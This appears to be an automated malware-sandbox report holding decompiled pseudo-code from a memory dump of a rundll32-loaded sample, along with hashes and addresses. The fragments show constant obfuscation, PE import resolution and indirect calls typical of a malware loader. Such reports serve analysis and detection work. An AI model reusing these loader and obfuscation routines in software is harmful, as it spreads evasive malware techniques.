                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                  			E002D7C37(void* __ecx, void* __edx) {
                                                                                                                                  				void* _t91;
                                                                                                                                  				void* _t102;
                                                                                                                                  				signed short _t108;
                                                                                                                                  				signed short _t111;
                                                                                                                                  				signed short _t113;
                                                                                                                                  				signed int _t115;
                                                                                                                                  				signed int _t116;
                                                                                                                                  				signed int _t117;
                                                                                                                                  				signed short _t121;
                                                                                                                                  				intOrPtr _t128;
                                                                                                                                  				signed short* _t132;
                                                                                                                                  				signed short _t133;
                                                                                                                                  				intOrPtr _t134;
                                                                                                                                  				void* _t135;
                                                                                                                                  				void* _t136;
                                                                                                                                  
                                                                                                                                  				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                  				_push(_t134);
                                                                                                                                  				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                  				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                  				_push(__edx);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t91);
                                                                                                                                  				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                                  				_t136 = _t135 + 0x14;
                                                                                                                                  				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                                  				_t115 = 0x47;
                                                                                                                                  				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                                  				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                                  				 *(_t136 + 0x28) = 0x411077;
                                                                                                                                  				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                                  				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                                  				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                                  				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                                  				_t116 = 0x13;
                                                                                                                                  				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                                  				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                                  				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                                  				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                                  				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                                  				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                                  				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                                  				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                                  				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                                  				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                                  				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                                  				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                                  				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                                  				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                                  				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                                  				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                                  				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                                  				_t117 =  *(_t136 + 0x18);
                                                                                                                                  				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                                  				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                                  				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                                  					L13:
                                                                                                                                  					return 1;
                                                                                                                                  				} else {
                                                                                                                                  					_t133 = _t128 + _t134;
                                                                                                                                  					while(1) {
                                                                                                                                  						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                                  						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                                  							goto L13;
                                                                                                                                  						}
                                                                                                                                  						_t121 = E002ECADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                                  						 *(_t136 + 0x18) = _t121;
                                                                                                                                  						__eflags = _t121;
                                                                                                                                  						if(_t121 == 0) {
                                                                                                                                  							L15:
                                                                                                                                  							return 0;
                                                                                                                                  						}
                                                                                                                                  						_t132 =  *_t133 + _t134;
                                                                                                                                  						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                                  						while(1) {
                                                                                                                                  							_t108 =  *_t132;
                                                                                                                                  							__eflags = _t108;
                                                                                                                                  							if(__eflags == 0) {
                                                                                                                                  								break;
                                                                                                                                  							}
                                                                                                                                  							if(__eflags >= 0) {
                                                                                                                                  								_t110 = _t108 + 2 + _t134;
                                                                                                                                  								__eflags = _t108 + 2 + _t134;
                                                                                                                                  							} else {
                                                                                                                                  								_t110 = _t108 & 0x0000ffff;
                                                                                                                                  							}
                                                                                                                                  							_t111 = E002D6CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                                  							_t136 = _t136 + 0x10;
                                                                                                                                  							__eflags = _t111;
                                                                                                                                  							if(_t111 == 0) {
                                                                                                                                  								goto L15;
                                                                                                                                  							} else {
                                                                                                                                  								_t121 =  *(_t136 + 0x18);
                                                                                                                                  								_t132 =  &(_t132[2]);
                                                                                                                                  								 *_t113 = _t111;
                                                                                                                                  								_t113 = _t113 + 4;
                                                                                                                                  								__eflags = _t113;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t133 = _t133 + 0x14;
                                                                                                                                  						__eflags = _t133;
                                                                                                                                  					}
                                                                                                                                  					goto L13;
                                                                                                                                  				}
                                                                                                                                  			}


















                                                                                                                                  0x002d7d27
                                                                                                                                  0x002d7d31
                                                                                                                                  0x002d7d35
                                                                                                                                  0x002d7d3d
                                                                                                                                  0x002d7d4a
                                                                                                                                  0x002d7d4e
                                                                                                                                  0x002d7d56
                                                                                                                                  0x002d7d5b
                                                                                                                                  0x002d7d66
                                                                                                                                  0x002d7d6a
                                                                                                                                  0x002d7d6c
                                                                                                                                  0x002d7d72
                                                                                                                                  0x002d7df1
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7d7b
                                                                                                                                  0x002d7d7b
                                                                                                                                  0x002d7dea
                                                                                                                                  0x002d7dea
                                                                                                                                  0x002d7def
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7d96
                                                                                                                                  0x002d7d98
                                                                                                                                  0x002d7d9c
                                                                                                                                  0x002d7d9e
                                                                                                                                  0x002d7dfc
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dfc
                                                                                                                                  0x002d7da5
                                                                                                                                  0x002d7da7
                                                                                                                                  0x002d7de1
                                                                                                                                  0x002d7de1
                                                                                                                                  0x002d7de3
                                                                                                                                  0x002d7de5
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dab
                                                                                                                                  0x002d7db5
                                                                                                                                  0x002d7db5
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dad
                                                                                                                                  0x002d7dc9
                                                                                                                                  0x002d7dce
                                                                                                                                  0x002d7dd1
                                                                                                                                  0x002d7dd3
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dd5
                                                                                                                                  0x002d7dd5
                                                                                                                                  0x002d7dd9
                                                                                                                                  0x002d7ddc
                                                                                                                                  0x002d7dde
                                                                                                                                  0x002d7dde
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dde
                                                                                                                                  0x002d7dd3
                                                                                                                                  0x002d7de7
                                                                                                                                  0x002d7de7
                                                                                                                                  0x002d7de7
                                                                                                                                  0x00000000
                                                                                                                                  0x002d7dea

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: X^wE$c`
                                                                                                                                  • API String ID: 0-1321574684
                                                                                                                                  • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                  • Instruction ID: e291472770a60918432b20b8bfd81d97766513888cab1a7d90e6176b356f1e0b
                                                                                                                                  • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                  • Instruction Fuzzy Hash: 745183715083429FC718DF25D88692BBBE2FFC4358F50481EF48696261E3B5DA58CF92
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E002D4C5D(intOrPtr _a4) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				signed int _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				void* _t106;
                                                                                                                                  				void* _t108;
                                                                                                                                  				intOrPtr* _t109;
                                                                                                                                  				signed int _t112;
                                                                                                                                  				signed int _t113;
                                                                                                                                  				signed int _t114;
                                                                                                                                  				intOrPtr _t128;
                                                                                                                                  
                                                                                                                                  				_v44 = _v44 & 0x00000000;
                                                                                                                                  				_v48 = 0xad4f7a;
                                                                                                                                  				_v16 = 0xf18dbd;
                                                                                                                                  				_v16 = _v16 + 0xffff4795;
                                                                                                                                  				_v16 = _v16 << 0xe;
                                                                                                                                  				_v16 = _v16 >> 6;
                                                                                                                                  				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                                  				_v12 = 0xaf5949;
                                                                                                                                  				_v12 = _v12 | 0xe2d389df;
                                                                                                                                  				_v12 = _v12 + 0x286;
                                                                                                                                  				_t112 = 3;
                                                                                                                                  				_v12 = _v12 / _t112;
                                                                                                                                  				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                                  				_v24 = 0x2aefd1;
                                                                                                                                  				_t113 = 0x7d;
                                                                                                                                  				_t128 = _a4;
                                                                                                                                  				_v24 = _v24 * 0x59;
                                                                                                                                  				_v24 = _v24 << 2;
                                                                                                                                  				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                                  				_v8 = 0x985427;
                                                                                                                                  				_v8 = _v8 << 2;
                                                                                                                                  				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                                  				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                                  				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                                  				_v28 = 0xa7f2b4;
                                                                                                                                  				_v28 = _v28 >> 0xc;
                                                                                                                                  				_v28 = _v28 + 0x7e4a;
                                                                                                                                  				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                                  				_v40 = 0x7087c6;
                                                                                                                                  				_t114 = 0x69;
                                                                                                                                  				_v40 = _v40 / _t113;
                                                                                                                                  				_v40 = _v40 ^ 0x00014835;
                                                                                                                                  				_v20 = 0xcde00b;
                                                                                                                                  				_v20 = _v20 + 0xffffcf30;
                                                                                                                                  				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                                  				_v20 = _v20 + 0xfc2b;
                                                                                                                                  				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                                  				_v36 = 0x30875a;
                                                                                                                                  				_v36 = _v36 * 0x47;
                                                                                                                                  				_v36 = _v36 / _t114;
                                                                                                                                  				_v36 = _v36 ^ 0x0028facf;
                                                                                                                                  				_v32 = 0x6c449b;
                                                                                                                                  				_v32 = _v32 >> 0xf;
                                                                                                                                  				_v32 = _v32 + 0xffff12fc;
                                                                                                                                  				_v32 = _v32 ^ 0xfff19483;
                                                                                                                                  				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                                  				_t134 = _t106;
                                                                                                                                  				if(_t106 != 0) {
                                                                                                                                  					_push(_v8);
                                                                                                                                  					_push(_v24);
                                                                                                                                  					_push(_v12);
                                                                                                                                  					_t108 = E002E8606(_v16, 0x2d1378, _t134);
                                                                                                                                  					_push(_v20);
                                                                                                                                  					_t130 = _t108;
                                                                                                                                  					_push(_t108);
                                                                                                                                  					_push(_v40);
                                                                                                                                  					_t109 = E002DCBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                                  					if(_t109 != 0) {
                                                                                                                                  						 *_t109();
                                                                                                                                  					}
                                                                                                                                  					E002DA8B0(_v36, _t130, _v32);
                                                                                                                                  				}
                                                                                                                                  				return 0;
                                                                                                                                  			}





















                                                                                                                                  0x002d4da3
                                                                                                                                  0x002d4da8
                                                                                                                                  0x002d4dab
                                                                                                                                  0x002d4dad
                                                                                                                                  0x002d4dae
                                                                                                                                  0x002d4db7
                                                                                                                                  0x002d4dc1
                                                                                                                                  0x002d4dc3
                                                                                                                                  0x002d4dc3
                                                                                                                                  0x002d4dcd
                                                                                                                                  0x002d4dd3
                                                                                                                                  0x002d4dda

                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: <,:q$J~
                                                                                                                                  • API String ID: 0-951887683
                                                                                                                                  • Opcode ID: 7d473088bc37a0ba9d37716cbab649426a69ff3acbb7a725edef59e10b0b32f2
                                                                                                                                  • Instruction ID: 5653b451abb60a1af39946e21b822fc92297b2dee7595fe2f1269b44bd0208a9
                                                                                                                                  • Opcode Fuzzy Hash: 7d473088bc37a0ba9d37716cbab649426a69ff3acbb7a725edef59e10b0b32f2
                                                                                                                                  • Instruction Fuzzy Hash: D6411F71D0130AABDF08CFA1C94A9EEBBB2FB54314F208159D400BA2A0D7B50B55CFA4
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E002DEE81(void* __eflags) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				char _v44;
                                                                                                                                  				short _v48;
                                                                                                                                  				short _v52;
                                                                                                                                  				intOrPtr _v56;
                                                                                                                                  				char _v576;
                                                                                                                                  				intOrPtr* _t95;
                                                                                                                                  				signed int _t99;
                                                                                                                                  				signed int _t100;
                                                                                                                                  
                                                                                                                                  				_v56 = 0x3b8b1c;
                                                                                                                                  				_v44 = 0;
                                                                                                                                  				_v52 = 0;
                                                                                                                                  				_v48 = 0;
                                                                                                                                  				_v8 = 0xf9e323;
                                                                                                                                  				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                                  				_v8 = _v8 + 0x5b26;
                                                                                                                                  				_v8 = _v8 ^ 0x387262e7;
                                                                                                                                  				_v8 = _v8 ^ 0x4b076809;
                                                                                                                                  				_v20 = 0x75aab0;
                                                                                                                                  				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                                  				_v20 = _v20 + 0x78e9;
                                                                                                                                  				_v20 = _v20 ^ 0xc4737271;
                                                                                                                                  				_v16 = 0xa8e87a;
                                                                                                                                  				_v16 = _v16 + 0xffff799a;
                                                                                                                                  				_t99 = 0x33;
                                                                                                                                  				_v16 = _v16 / _t99;
                                                                                                                                  				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                                  				_v28 = 0x7feeb5;
                                                                                                                                  				_v28 = _v28 + 0xffffe4f6;
                                                                                                                                  				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                                  				_v32 = 0x59c916;
                                                                                                                                  				_t100 = 0x5d;
                                                                                                                                  				_v32 = _v32 / _t100;
                                                                                                                                  				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                                  				_v12 = 0x866588;
                                                                                                                                  				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                                  				_v12 = _v12 + 0xffffbaa5;
                                                                                                                                  				_v12 = _v12 ^ 0x68223e43;
                                                                                                                                  				_v36 = 0xbafac2;
                                                                                                                                  				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                                  				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                                  				_v24 = 0xc770cb;
                                                                                                                                  				_v24 = _v24 >> 0xf;
                                                                                                                                  				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                                  				_v24 = _v24 ^ 0x956359d7;
                                                                                                                                  				_v40 = 0xbd0b83;
                                                                                                                                  				_v40 = _v40 >> 3;
                                                                                                                                  				_v40 = _v40 ^ 0x001e2563;
                                                                                                                                  				_t101 = _v8;
                                                                                                                                  				if(E002E8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                                  					_t95 =  &_v576;
                                                                                                                                  					if(_v576 != 0) {
                                                                                                                                  						while( *_t95 != 0x5c) {
                                                                                                                                  							_t95 = _t95 + 2;
                                                                                                                                  							if( *_t95 != 0) {
                                                                                                                                  								continue;
                                                                                                                                  							} else {
                                                                                                                                  							}
                                                                                                                                  							goto L6;
                                                                                                                                  						}
                                                                                                                                  						_t101 = 0;
                                                                                                                                  						 *((short*)(_t95 + 2)) = 0;
                                                                                                                                  					}
                                                                                                                                  					L6:
                                                                                                                                  					E002EDB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                                  				}
                                                                                                                                  				return _v44;
                                                                                                                                  			}





















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: C>"h$br8
                                                                                                                                  • API String ID: 0-573140060
                                                                                                                                  • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                  • Instruction ID: 47f80d6e184901399ab4626288f01866cb2032d8af9029b839e3a697b8bf0dce
                                                                                                                                  • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                  • Instruction Fuzzy Hash: E041F272C0121EEBCF18DFE4C94A5EEBBB5FB04304F20819AE515B6260E3B45A55CF91
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 88%
                                                                                                                                  			E002EAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				unsigned int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				signed int _v28;
                                                                                                                                  				signed int _v32;
                                                                                                                                  				signed int _v36;
                                                                                                                                  				signed int _v40;
                                                                                                                                  				intOrPtr _v44;
                                                                                                                                  				intOrPtr _v48;
                                                                                                                                  				void* _t83;
                                                                                                                                  				signed int _t85;
                                                                                                                                  				signed int _t91;
                                                                                                                                  
                                                                                                                                  				_v40 = _v40 & 0x00000000;
                                                                                                                                  				_v48 = 0xea50c7;
                                                                                                                                  				_v44 = 0x183406;
                                                                                                                                  				_v8 = 0x4cb37c;
                                                                                                                                  				_v8 = _v8 + 0xc736;
                                                                                                                                  				_v8 = _v8 + 0xd4a7;
                                                                                                                                  				_t91 = __edx;
                                                                                                                                  				_t85 = 0x64;
                                                                                                                                  				_v8 = _v8 * 0x2d;
                                                                                                                                  				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                                  				_v24 = 0x238f3e;
                                                                                                                                  				_v24 = _v24 << 3;
                                                                                                                                  				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                                  				_v20 = 0x73abc8;
                                                                                                                                  				_v20 = _v20 >> 3;
                                                                                                                                  				_v20 = _v20 ^ 0x00035013;
                                                                                                                                  				_v16 = 0x5012b6;
                                                                                                                                  				_v16 = _v16 >> 0x10;
                                                                                                                                  				_v16 = _v16 / _t85;
                                                                                                                                  				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                                  				_v12 = 0x8c34bb;
                                                                                                                                  				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                                  				_v12 = _v12 + 0xffff11fb;
                                                                                                                                  				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                                  				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                                  				_v36 = 0xff820a;
                                                                                                                                  				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                                  				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                                  				_v32 = 0x36506a;
                                                                                                                                  				_v32 = _v32 + 0x4de;
                                                                                                                                  				_v32 = _v32 ^ 0x003709b9;
                                                                                                                                  				_v28 = 0x64fd3b;
                                                                                                                                  				_v28 = _v28 + 0xffff3e7a;
                                                                                                                                  				_v28 = _v28 ^ 0x00656766;
                                                                                                                                  				if( *((intOrPtr*)(0x2f3210 + __edx * 4)) == 0) {
                                                                                                                                  					_t83 = E002E0A0E(_t85, _t85, _a4);
                                                                                                                                  					_push(_v28);
                                                                                                                                  					_push(_a12);
                                                                                                                                  					_push(_v32);
                                                                                                                                  					_push(_t83);
                                                                                                                                  					 *((intOrPtr*)(0x2f3210 + _t91 * 4)) = E002DCDCD(_v12, _v36);
                                                                                                                                  				}
                                                                                                                                  				return  *((intOrPtr*)(0x2f3210 + _t91 * 4));
                                                                                                                                  			}


















                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fge$jP6
                                                                                                                                  • API String ID: 0-775479084
                                                                                                                                  • Opcode ID: a1f4548dfc3eca77017b3754098c7c7bcbe6bc34bb943c5378e230eb2a9e894e
                                                                                                                                  • Instruction ID: 12918f9da8feabb982f0af5649e139c0763c73aa8cac5a549ed3a48883028361
                                                                                                                                  • Opcode Fuzzy Hash: a1f4548dfc3eca77017b3754098c7c7bcbe6bc34bb943c5378e230eb2a9e894e
                                                                                                                                  • Instruction Fuzzy Hash: E031EEB1C0020DEBCB08DFA5CA8A9AEBBB5FB08318F108159D511B6220C3B95A49CF95
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                  			E002F0E3A(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				signed int _v12;
                                                                                                                                  				signed int _v16;
                                                                                                                                  				signed int _v20;
                                                                                                                                  				signed int _v24;
                                                                                                                                  				void* _t61;
                                                                                                                                  				intOrPtr _t66;
                                                                                                                                  				void* _t73;
                                                                                                                                  				intOrPtr* _t74;
                                                                                                                                  
                                                                                                                                  				_t74 = _a16;
                                                                                                                                  				_push(_t74);
                                                                                                                                  				_push(_a12);
                                                                                                                                  				_t73 = __ecx;
                                                                                                                                  				_push(_a8);
                                                                                                                                  				_push(_a4);
                                                                                                                                  				_push(__ecx);
                                                                                                                                  				E002E20B9(_t61);
                                                                                                                                  				_v16 = 0x2b4f5d;
                                                                                                                                  				_v16 = _v16 * 0x1c;
                                                                                                                                  				_v16 = _v16 >> 8;
                                                                                                                                  				_v16 = _v16 ^ 0x000abada;
                                                                                                                                  				_v24 = 0x6f176d;
                                                                                                                                  				_v24 = _v24 | 0x8892b5fd;
                                                                                                                                  				_v24 = _v24 ^ 0x88fd6dba;
                                                                                                                                  				_v12 = 0x9049ef;
                                                                                                                                  				_v12 = _v12 >> 4;
                                                                                                                                  				_v12 = _v12 ^ 0x7aa47b64;
                                                                                                                                  				_v12 = _v12 ^ 0x7aa68413;
                                                                                                                                  				_a16 = 0x9c064;
                                                                                                                                  				_a16 = _a16 + 0x4e6a;
                                                                                                                                  				_a16 = _a16 + 0xffffd44e;
                                                                                                                                  				_a16 = _a16 | 0x475ceb65;
                                                                                                                                  				_a16 = _a16 ^ 0x47532e3d;
                                                                                                                                  				_v8 = 0xaf6c6f;
                                                                                                                                  				_v8 = _v8 >> 6;
                                                                                                                                  				_v8 = _v8 + 0xad29;
                                                                                                                                  				_v8 = _v8 + 0xd52;
                                                                                                                                  				_v8 = _v8 ^ 0x000b7d9e;
                                                                                                                                  				_v20 = 0xd79f7b;
                                                                                                                                  				_v20 = _v20 ^ 0x214a9efd;
                                                                                                                                  				_v20 = _v20 >> 5;
                                                                                                                                  				_v20 = _v20 ^ 0x010f9d8f;
                                                                                                                                  				E002E0DAF(_v16, __ecx, _v24,  *((intOrPtr*)(_t74 + 4)), _v12, _a16);
                                                                                                                                  				E002DED7E(_v8,  *((intOrPtr*)(__ecx + 0x24)), _v20,  *_t74,  *((intOrPtr*)(_t74 + 4)));
                                                                                                                                  				_t66 =  *((intOrPtr*)(_t74 + 4));
                                                                                                                                  				 *((intOrPtr*)(_t73 + 0x24)) =  *((intOrPtr*)(_t73 + 0x24)) + _t66;
                                                                                                                                  				return _t66;
                                                                                                                                  			}













                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000009.00000002.451115709.00000000002D1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002D0000, based on PE: true
                                                                                                                                  • Associated: 00000009.00000002.451090160.00000000002D0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  • Associated: 00000009.00000002.451178530.00000000002F3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_9_2_2d0000_rundll32.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: =.SG$]O+
                                                                                                                                  • API String ID: 0-348654084
                                                                                                                                  • Opcode ID: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                  • Instruction ID: a2fd5e8f492ed5daabd5c8c105aeef7201885838c58b98d1d51630d9d213f67f
                                                                                                                                  • Opcode Fuzzy Hash: 811b6f2f76830c34ea4266ae866f97b41912dbbec6264efcae1f5081a5439904
                                                                                                                                  • Instruction Fuzzy Hash: B021457180120DEFCF05DFE5DA4A8AEBBB1FF45304F208599E92562224C3B19B24DFA1
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
